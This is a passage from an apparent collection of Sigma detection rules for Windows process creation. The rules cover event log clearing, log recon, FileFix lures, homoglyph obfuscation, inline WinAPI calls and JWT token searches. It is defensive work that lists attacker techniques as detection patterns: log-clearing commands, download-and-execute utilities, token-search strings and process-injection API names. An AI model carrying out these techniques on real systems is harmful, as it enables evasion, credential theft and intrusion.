selection_wevtutil_cmd:\n        CommandLine|contains:\n            - 'clear-log '          # clears specified log\n            - ' cl '                # short version of 'clear-log'\n            - 'set-log '            # modifies config of specified log. could be uset to set it to a tiny size\n            - ' sl '                # short version of 'set-log'\n            - 'lfn:'                # change log file location and name\n    selection_other_ps_img:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n    selection_other_ps_cmd:\n        - CommandLine|contains:\n              - 'Clear-EventLog '\n              - 'Remove-EventLog '\n              - 'Limit-EventLog '\n              - 'Clear-WinEvent '\n        - CommandLine|contains|all:\n              - 'Eventing.Reader.EventLogSession' # [System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($_.LogName)\n              - 'ClearLog'\n        - CommandLine|contains|all:\n              - 'Diagnostics.EventLog'\n              - 'Clear'\n    selection_other_wmi:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n            - '\\wmic.exe'\n        CommandLine|contains: 'ClearEventLog'\n    filter_main_msiexec:\n        # Example seen during office update/installation:\n        #   ParentImage: C:\\Windows\\SysWOW64\\msiexec.exe\n        #   CommandLine: \"C:\\WINDOWS\\system32\\wevtutil.exe\" sl Microsoft-RMS-MSIPC/Debug /q:true /e:true /l:4 /rt:false\n        ParentImage:\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n            - 'C:\\Windows\\System32\\msiexec.exe'\n        CommandLine|contains: ' sl '\n    condition: (all of selection_wevtutil_*) or (all of selection_other_ps_*) or (selection_other_wmi) and not 1 of filter_main_*\nfalsepositives:\n    - Admin activity\n    - Scripts and administrative tools used in the monitored environment\n    - Maintenance activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon.yml",
    "content": "title: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities\nid: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf\nrelated:\n    - id: 9cd55b6c-430a-4fa9-96f4-7cadf5229e9f\n      type: derived\nstatus: test\ndescription: |\n    Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.\n    This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.\nreferences:\n    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\n    - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a\n    - https://www.group-ib.com/blog/apt41-world-tour-2021/\n    - https://labs.withsecure.com/content/dam/labs/docs/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1\n    - http://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil\n    - https://ptsecurity.com/research/pt-esc-threat-intelligence/striking-panda-attacks-apt31-today\n    - https://www.cybertriage.com/artifact/terminalservices_remoteconnectionmanager_log/\n    - https://ponderthebits.com/2018/02/windows-rdp-related-event-logs-identification-tracking-and-investigation/\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2022-09-09\nmodified: 2025-12-02\ntags:\n    - attack.credential-access\n    - attack.discovery\n    - attack.t1552\n    - attack.t1087\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_wmi:\n        CommandLine|contains|all:\n            - 'Select'\n            - 'Win32_NTLogEvent'\n    selection_wevtutil_img:\n        - Image|endswith: '\\wevtutil.exe'\n        - OriginalFileName: 'wevtutil.exe'\n    selection_wevtutil_cli:\n        CommandLine|contains:\n            - ' qe '\n            - ' query-events '\n    selection_wmic_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_wmic_cli:\n        CommandLine|contains: ' ntevent'\n    selection_cmdlet:\n        CommandLine|contains:\n            - 'Get-WinEvent '\n            - 'get-eventlog '\n    selection_logs_name:\n        CommandLine|contains:\n            # Note: Add more event log channels that are interesting for attackers\n            - 'Microsoft-Windows-PowerShell'\n            - 'Microsoft-Windows-Security-Auditing'\n            - 'Microsoft-Windows-TerminalServices-LocalSessionManager'\n            - 'Microsoft-Windows-TerminalServices-RemoteConnectionManager'\n            - 'Microsoft-Windows-Windows Defender'\n            - 'PowerShellCore'\n            - 'Security'\n            - 'Windows PowerShell'\n    selection_logs_eid:\n        CommandLine|contains:\n            # Note: We use the \"?\" to account for both a single and a double quote\n            # Note: Please add additional interesting event IDs\n            # Note: As this only focuses on EIDs and we know EIDs are not unique across providers. Rare FPs might occur with legit queries to EIDs from different providers.\n            # This covers EID 4624 and 4628 from Security Log\n            - '-InstanceId 462?'\n            - '.eventid -eq 462?'\n            - '.ID -eq 462?'\n            - 'EventCode=?462?'\n            - 'EventIdentifier=?462?'\n            - 'System[EventID=462?]'\n            # This covers EID 4778 from Security Log\n            - '-InstanceId 4778'\n            - '.eventid -eq 4778'\n            - '.ID -eq 4778'\n            - 'EventCode=?4778?'\n            - 'EventIdentifier=?4778?'\n            - 'System[EventID=4778]'\n            # This covers EID 25 from Microsoft-Windows-TerminalServices-LocalSessionManager/Operational log\n            - '-InstanceId 25'\n            - '.eventid -eq 25'\n            - '.ID -eq 25'\n            - 'EventCode=?25?'\n            - 'EventIdentifier=?25?'\n            - 'System[EventID=25]'\n            # This covers EID 1149 from Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational log\n            - '-InstanceId 1149'\n            - '.eventid -eq 1149'\n            - '.ID -eq 1149'\n            - 'EventCode=?1149?'\n            - 'EventIdentifier=?1149?'\n            - 'System[EventID=1149]'\n            # This covers EID 21 from Microsoft-Windows-TerminalServices-LocalSessionManager/Operational log\n            - '-InstanceId 21'\n            - '.eventid -eq 21'\n            - '.ID -eq 21'\n            - 'EventCode=?21?'\n            - 'EventIdentifier=?21?'\n            - 'System[EventID=21]'\n            # This covers EID 22 from Microsoft-Windows-TerminalServices-LocalSessionManager/Operational log\n            - '-InstanceId 22'\n            - '.eventid -eq 22'\n            - '.ID -eq 22'\n            - 'EventCode=?22?'\n            - 'EventIdentifier=?22?'\n            - 'System[EventID=22]'\n    condition: 1 of selection_logs_* and (selection_wmi or all of selection_wevtutil_* or all of selection_wmic_* or selection_cmdlet)\nfalsepositives:\n    - Legitimate usage of the utility by administrators to query the event log\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml",
    "content": "title: Potentially Suspicious Execution From Parent Process In Public Folder\nid: 69bd9b97-2be2-41b6-9816-fb08757a4d1a\nstatus: test\ndescription: |\n    Detects a potentially suspicious execution of a parent process located in the \"\\Users\\Public\" folder executing a child process containing references to shell or scripting binaries and commandlines.\nreferences:\n    - https://redcanary.com/blog/blackbyte-ransomware/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-02-25\nmodified: 2024-07-12\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1564\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|contains: ':\\Users\\Public\\'\n    selection_child:\n        - Image|endswith:\n              - '\\bitsadmin.exe'\n              - '\\certutil.exe'\n              - '\\cmd.exe'\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        - CommandLine|contains:\n              - 'bitsadmin'\n              - 'certutil'\n              - 'cscript'\n              - 'mshta'\n              - 'powershell'\n              - 'regsvr32'\n              - 'rundll32'\n              - 'wscript'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_execution_path.yml",
    "content": "title: Process Execution From A Potentially Suspicious Folder\nid: 3dfd06d2-eaf4-4532-9555-68aca59f57c4\nstatus: test\ndescription: Detects a potentially suspicious execution from an uncommon folder.\nreferences:\n    - https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt\n    - https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses\n    - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/\n    - https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md\nauthor: Florian Roth (Nextron Systems), Tim Shelton\ndate: 2019-01-16\nmodified: 2024-07-12\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - ':\\Perflogs\\'\n            - ':\\Users\\All Users\\'\n            - ':\\Users\\Default\\'\n            - ':\\Users\\NetworkService\\'\n            - ':\\Windows\\addins\\'\n            - ':\\Windows\\debug\\'\n            - ':\\Windows\\Fonts\\'\n            - ':\\Windows\\Help\\'\n            - ':\\Windows\\IME\\'\n            - ':\\Windows\\Media\\'\n            - ':\\Windows\\repair\\'\n            - ':\\Windows\\security\\'\n            - ':\\Windows\\System32\\Tasks\\'\n            - ':\\Windows\\Tasks\\'\n            - '$Recycle.bin'\n            - '\\config\\systemprofile\\'\n            - '\\Intel\\Logs\\'\n            - '\\RSA\\MachineKeys\\'\n    filter_optional_ibm:\n        Image|startswith: 'C:\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\'\n    filter_optional_citrix:\n        Image|startswith: 'C:\\Windows\\SysWOW64\\config\\systemprofile\\Citrix\\UpdaterBinaries\\'\n        Image|endswith: '\\CitrixReceiverUpdater.exe'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml",
    "content": "title: Suspicious File Characteristics Due to Missing Fields\nid: 9637e8a5-7131-4f7f-bdc7-2b05d8670c43\nstatus: test\ndescription: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe\nreferences:\n    - https://securelist.com/muddywater/88059/\n    - https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection\nauthor: Markus Neis, Sander Wiebing\ndate: 2018-11-22\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.t1059.006\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection1:\n        Description: '\\?'\n        FileVersion: '\\?'\n    selection2:\n        Description: '\\?'\n        Product: '\\?'\n    selection3:\n        Description: '\\?'\n        Company: '\\?'\n    folder:\n        Image|contains: '\\Downloads\\'\n    condition: (selection1 or selection2 or selection3) and folder\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_filefix_execution_pattern.yml",
    "content": "title: Suspicious FileFix Execution Pattern\nid: b5b29e4e-31fa-4fdf-b058-296e7a1aa0c2\nrelated:\n    - id: 4fee3d51-8069-4a4c-a0f7-924fcaff2c70\n      type: similar\n    - id: 4be03877-d5b6-4520-85c9-a5911c0a656c\n      type: obsolete\nstatus: experimental\ndescription: |\n    Detects suspicious FileFix execution patterns where users are tricked into running malicious commands through browser file upload dialog manipulation.\n    This attack typically begins when users visit malicious websites impersonating legitimate services or news platforms,\n    which may display fake CAPTCHA challenges or direct instructions to open file explorer and paste clipboard content.\n    The clipboard content usually contains commands that download and execute malware, such as information stealing tools.\nreferences:\n    - https://mrd0x.com/filefix-clickfix-alternative/\n    - https://expel.com/blog/cache-smuggling-when-a-picture-isnt-a-thousand-words/ # phishing lure directly asking users to open file explorer and paste command\n    - https://blog.checkpoint.com/research/filefix-the-new-social-engineering-attack-building-on-clickfix-tested-in-the-wild/\nauthor: 0xFustang, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-24\ntags:\n    - attack.execution\n    - attack.t1204.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_exec_parent:\n        # This is case where phishing pages trick users to paste commands in browser file upload dialog\n        ParentImage|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\firefox.exe'\n            - '\\msedge.exe'\n        CommandLine|contains: '#'\n    selection_cli_lolbin:\n        CommandLine|contains:\n            - '%comspec%'\n            - 'bitsadmin'\n            - 'certutil'\n            - 'cmd'\n            - 'cscript'\n            - 'curl'\n            - 'finger'\n            - 'mshta'\n            - 'powershell'\n            - 'pwsh'\n            - 'regsvr32'\n            - 'rundll32'\n            - 'schtasks'\n            - 'wget'\n            - 'wscript'\n    selection_cli_captcha:\n        CommandLine|contains:\n            - 'account'\n            - 'anti-bot'\n            - 'botcheck'\n            - 'captcha'\n            - 'challenge'\n            - 'confirmation'\n            - 'fraud'\n            - 'human'\n            - 'identification'\n            - 'identificator'\n            - 'identity'\n            - 'robot'\n            - 'validation'\n            - 'verification'\n            - 'verify'\n    condition: selection_exec_parent and 1 of selection_cli_*\nfalsepositives:\n    - Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_gather_network_info_execution.yml",
    "content": "title: Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS\nid: 07aa184a-870d-413d-893a-157f317f6f58\nrelated:\n    - id: f92a6f1e-a512-4a15-9735-da09e78d7273 # FileCreate\n      type: similar\n    - id: 575dce0c-8139-4e30-9295-1ee75969f7fe # ProcCreation LOLBIN\n      type: similar\nstatus: test\ndescription: Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine\nreferences:\n    - https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs\n    - https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-08\ntags:\n    - attack.discovery\n    - attack.execution\n    - attack.t1615\n    - attack.t1059.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: 'gatherNetworkInfo.vbs'\n    filter:\n        Image|endswith:\n            - '\\cscript.exe'\n            - '\\wscript.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml",
    "content": "title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI\nid: 0900463c-b33b-49a8-be1d-552a3b553dae\nrelated:\n    - id: a8f866e1-bdd4-425e-a27a-37619238d9c7\n      type: similar\nstatus: test\ndescription: |\n    Detects command line containing reference to the \"::$index_allocation\" stream, which can be used as a technique to prevent access to folders or files from tooling such as \"explorer.exe\" or \"powershell.exe\"\nreferences:\n    - https://twitter.com/pfiatde/status/1681977680688738305\n    - https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/\n    - https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/\n    - https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3\nauthor: Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl)\ndate: 2023-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        # Note: Both Sysmon and ETW are unable to log the presence of such stream in the CommandLine. But EDRs such as Crowdstrike are able to using for example CMD console history. Users are advised to test this before usage\n        CommandLine|contains: '::$index_allocation'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml",
    "content": "title: Writing Of Malicious Files To The Fonts Folder\nid: ae9b0bd7-8888-4606-b444-0ed7410cb728\nstatus: test\ndescription: Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.\nreferences:\n    - https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/\nauthor: Sreeman\ndate: 2020-04-21\nmodified: 2022-03-08\ntags:\n    - attack.t1211\n    - attack.t1059\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.execution\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_1:\n        CommandLine|contains:\n            - 'echo'\n            - 'copy'\n            - 'type'\n            - 'file createnew'\n            - 'cacls'\n    selection_2:\n        CommandLine|contains: 'C:\\Windows\\Fonts\\'\n    selection_3:\n        CommandLine|contains:\n            - '.sh'\n            - '.exe'\n            - '.dll'\n            - '.bin'\n            - '.bat'\n            - '.cmd'\n            - '.js'\n            - '.msh'\n            - '.reg'\n            - '.scr'\n            - '.ps'\n            - '.vb'\n            - '.jar'\n            - '.pl'\n            - '.inf'\n            - '.cpl'\n            - '.hta'\n            - '.msi'\n            - '.vbs'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml",
    "content": "title: Potential Homoglyph Attack Using Lookalike Characters\nid: 32e280f1-8ad4-46ef-9e80-910657611fbc\nstatus: test\ndescription: |\n    Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.\n    This is used as an obfuscation and masquerading techniques. Only \"perfect\" homoglyphs are included; these are characters that\n    are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.\nreferences:\n    - https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish\n    - http://www.irongeek.com/homoglyph-attack-generator.php\nauthor: Micah Babinski, @micahbabinski\ndate: 2023-05-07\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1036.003\n   # - attack.t1036.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_upper:\n        CommandLine|contains:\n            - \"\\u0410\" # А/A\n            - \"\\u0412\" # В/B\n            - \"\\u0415\" # Е/E\n            - \"\\u041a\" # К/K\n            - \"\\u041c\" # М/M\n            - \"\\u041d\" # Н/H\n            - \"\\u041e\" # О/O\n            - \"\\u0420\" # Р/P\n            - \"\\u0421\" # С/C\n            - \"\\u0422\" # Т/T\n            - \"\\u0425\" # Х/X\n            - \"\\u0405\" # Ѕ/S\n            - \"\\u0406\" # І/I\n            - \"\\u0408\" # Ј/J\n            - \"\\u04ae\" # Ү/Y\n            - \"\\u04c0\" # Ӏ/I\n            - \"\\u050C\" # Ԍ/G\n            - \"\\u051a\" # Ԛ/Q\n            - \"\\u051c\" # Ԝ/W\n            - \"\\u0391\" # Α/A\n            - \"\\u0392\" # Β/B\n            - \"\\u0395\" # Ε/E\n            - \"\\u0396\" # Ζ/Z\n            - \"\\u0397\" # Η/H\n            - \"\\u0399\" # Ι/I\n            - \"\\u039a\" # Κ/K\n            - \"\\u039c\" # Μ/M\n            - \"\\u039d\" # Ν/N\n            - \"\\u039f\" # Ο/O\n            - \"\\u03a1\" # Ρ/P\n            - \"\\u03a4\" # Τ/T\n            - \"\\u03a5\" # Υ/Y\n            - \"\\u03a7\" # Χ/X\n    selection_lower:\n        CommandLine|contains:\n            - \"\\u0430\" # а/a\n            - \"\\u0435\" # е/e\n            - \"\\u043e\" # о/o\n            - \"\\u0440\" # р/p\n            - \"\\u0441\" # с/c\n            - \"\\u0445\" # х/x\n            - \"\\u0455\" # ѕ/s\n            - \"\\u0456\" # і/i\n            - \"\\u04cf\" # ӏ/l\n            - \"\\u0458\" # ј/j\n            - \"\\u04bb\" # һ/h\n            - \"\\u0501\" # ԁ/d\n            - \"\\u051b\" # ԛ/q\n            - \"\\u051d\" # ԝ/w\n            - \"\\u03bf\" # ο/o\n    condition: 1 of selection_*\nfalsepositives:\n    - Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_image_missing.yml",
    "content": "title: Execution Of Non-Existing File\nid: 71158e3f-df67-472b-930e-7d287acaa3e1\nstatus: test\ndescription: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)\nreferences:\n    - https://pentestlaboratories.com/2021/12/08/process-ghosting/\nauthor: Max Altgelt (Nextron Systems)\ndate: 2021-12-09\nmodified: 2022-12-14\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    image_absolute_path:\n        Image|contains: '\\'\n    filter_null:\n        Image: null\n    filter_empty:\n        Image:\n            - '-'\n            - ''\n    filter_4688:\n        - Image:\n              - 'System'\n              - 'Registry'\n              - 'MemCompression'\n              - 'vmmem'\n        - CommandLine:\n              - 'Registry'\n              - 'MemCompression'\n              - 'vmmem'\n    condition: not image_absolute_path and not 1 of filter*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml",
    "content": "title: Base64 MZ Header In CommandLine\nid: 22e58743-4ac8-4a9f-bf19-00a0428d8c5f\nstatus: test\ndescription: Detects encoded base64 MZ header in the commandline\nreferences:\n    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-12\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'TVqQAAMAAAAEAAAA' # MZ..........\n            - 'TVpQAAIAAAAEAA8A'\n            - 'TVqAAAEAAAAEABAA'\n            - 'TVoAAAAAAAAAAAAA'\n            - 'TVpTAQEAAAAEAAAA'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_inline_node_js_execution.yml",
    "content": "title: Potentially Suspicious Inline JavaScript Execution via NodeJS Binary\nid: 8537c866-072e-460d-bfff-aaf39cbd73d3\nstatus: experimental\ndescription: Detects potentially suspicious inline JavaScript execution using Node.js with specific keywords in the command line.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2025/04/15/threat-actors-misuse-node-js-to-deliver-malware-and-other-malicious-payloads/\nauthor: Microsoft (idea), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-04-21\ntags:\n    - attack.execution\n    - attack.t1059.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\node.exe'\n        - OriginalFileName: 'node.exe'\n        - Product: 'Node.js'\n    selection_cmd:\n        CommandLine|contains|all:\n            - 'http'\n            - 'execSync'\n            - 'spawn'\n            - 'fs'\n            - 'path'\n            - 'zlib'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate scripts using Node.js with these modules\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_inline_win_api_access.yml",
    "content": "title: Potential WinAPI Calls Via CommandLine\nid: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702\nrelated:\n    - id: 03d83090-8cba-44a0-b02f-0b756a050306\n      type: derived\nstatus: test\ndescription: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec\nreferences:\n    - https://twitter.com/m417z/status/1566674631788007425\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-06\nmodified: 2025-03-06\ntags:\n    - attack.execution\n    - attack.t1106\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'AddSecurityPackage'\n            - 'AdjustTokenPrivileges'\n            - 'Advapi32'\n            - 'CloseHandle'\n            - 'CreateProcessWithToken'\n            - 'CreatePseudoConsole'\n            - 'CreateRemoteThread'\n            - 'CreateThread'\n            - 'CreateUserThread'\n            - 'DangerousGetHandle'\n            - 'DuplicateTokenEx'\n            - 'EnumerateSecurityPackages'\n            - 'FreeHGlobal'\n            - 'FreeLibrary'\n            - 'GetDelegateForFunctionPointer'\n            - 'GetLogonSessionData'\n            - 'GetModuleHandle'\n            - 'GetProcAddress'\n            - 'GetProcessHandle'\n            - 'GetTokenInformation'\n            - 'ImpersonateLoggedOnUser'\n            - 'kernel32'\n            - 'LoadLibrary'\n            - 'memcpy'\n            - 'MiniDumpWriteDump'\n            # - 'msvcrt'\n            - 'ntdll'\n            - 'OpenDesktop'\n            - 'OpenProcess'\n            - 'OpenProcessToken'\n            - 'OpenThreadToken'\n            - 'OpenWindowStation'\n            - 'PtrToString'\n            - 'QueueUserApc'\n            - 'ReadProcessMemory'\n            - 'RevertToSelf'\n            - 'RtlCreateUserThread'\n            - 'secur32'\n            - 'SetThreadToken'\n            # - 'user32'\n            - 'VirtualAlloc'\n            - 'VirtualFree'\n            - 'VirtualProtect'\n            - 'WaitForSingleObject'\n            - 'WriteInt32'\n            - 'WriteProcessMemory'\n            - 'ZeroFreeGlobalAllocUnicode'\n    filter_optional_mpcmdrun:\n        Image|endswith: '\\MpCmdRun.exe'\n        CommandLine|contains: 'GetLoadLibraryWAddress32'\n    filter_optional_compatTelRunner:\n        ParentImage|endswith: '\\CompatTelRunner.exe'\n        CommandLine|contains:\n            - 'FreeHGlobal'\n            - 'PtrToString'\n            - 'kernel32'\n            - 'CloseHandle'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Some legitimate action or applications may use these functions. Investigate further to determine the legitimacy of the activity.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_jwt_token_search.yml",
    "content": "title: Potentially Suspicious JWT Token Search Via CLI\nid: 6d3a3952-6530-44a3-8554-cf17c116c615\nstatus: test\ndescription: |\n    Detects potentially suspicious search for JWT tokens via CLI by looking for the string \"eyJ0eX\" or \"eyJhbG\".\n    JWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others.\n    Threat actors may search for these tokens to steal them for lateral movement or privilege escalation.\nreferences:\n    - https://mrd0x.com/stealing-tokens-from-office-applications/\n    - https://www.scip.ch/en/?labs.20240523\nauthor: Nasreddine Bencherchali (Nextron Systems), kagebunsher\ndate: 2022-10-25\nmodified: 2025-10-21\ntags:\n    - attack.credential-access\n    - attack.t1528\n    - attack.t1552.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_tools:\n        CommandLine|contains:\n            - 'find '\n            - 'find.exe'\n            - 'findstr'\n            - 'select-string '\n            - 'strings'\n    selection_jwt_string:\n        CommandLine|contains:\n            - 'eyJ0eXAiOi' # {\"typ\":\n            - 'eyJhbGciOi' # {\"alg\":\n            - ' eyJ0eX'\n            - ' \"eyJ0eX\"'\n            - \" 'eyJ0eX'\"\n            - ' eyJhbG'\n            - ' \"eyJhbG\"'\n            - \" 'eyJhbG'\"\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_lnk_exec_hidden_cmd.yml",
    "content": "title: Suspicious LNK Command-Line Padding with Whitespace Characters\nid: dd8756e7-a3a0-4768-b47e-8f545d1a751c\nstatus: experimental\ndescription: |\n    Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D).\n    Adversaries insert non-printable whitespace characters (e.g., Line Feed \\x0A, Carriage Return \\x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary.\n    The hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion—commonly used for social engineering attacks.\n    This rule flags suspicious use of such padding observed in real-world attacks.\nreferences:\n    - https://syedhasan010.medium.com/forensics-analysis-of-an-lnk-file-da68a98b8415\n    - https://thehackernews.com/2025/03/unpatched-windows-zero-day-flaw.html\n    - https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-03-19\ntags:\n    - attack.initial-access\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - ParentImage|endswith: '\\explorer.exe'\n        - ParentCommandLine|contains: '.lnk'\n    selection_cmd:\n        - CommandLine|contains:\n              - '                 '  # Padding of SPACE (0x20)\n            # - '\t'  # Horizontal Tab (0x9)\n              - '\\u0009'\n              - '\\u000A' # Line Feed\n              - '\\u0011'\n              - '\\u0012'\n              - '\\u0013'\n              - '\\u000B' # Vertical Tab\n              - '\\u000C'  # \\x0C\n              - '\\u000D'  # \\x0D\n        - CommandLine|re: '\\n\\n\\n\\n\\n\\n' # In some cases \\u000[ABCD] are represented as a newline in the eventlog\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml",
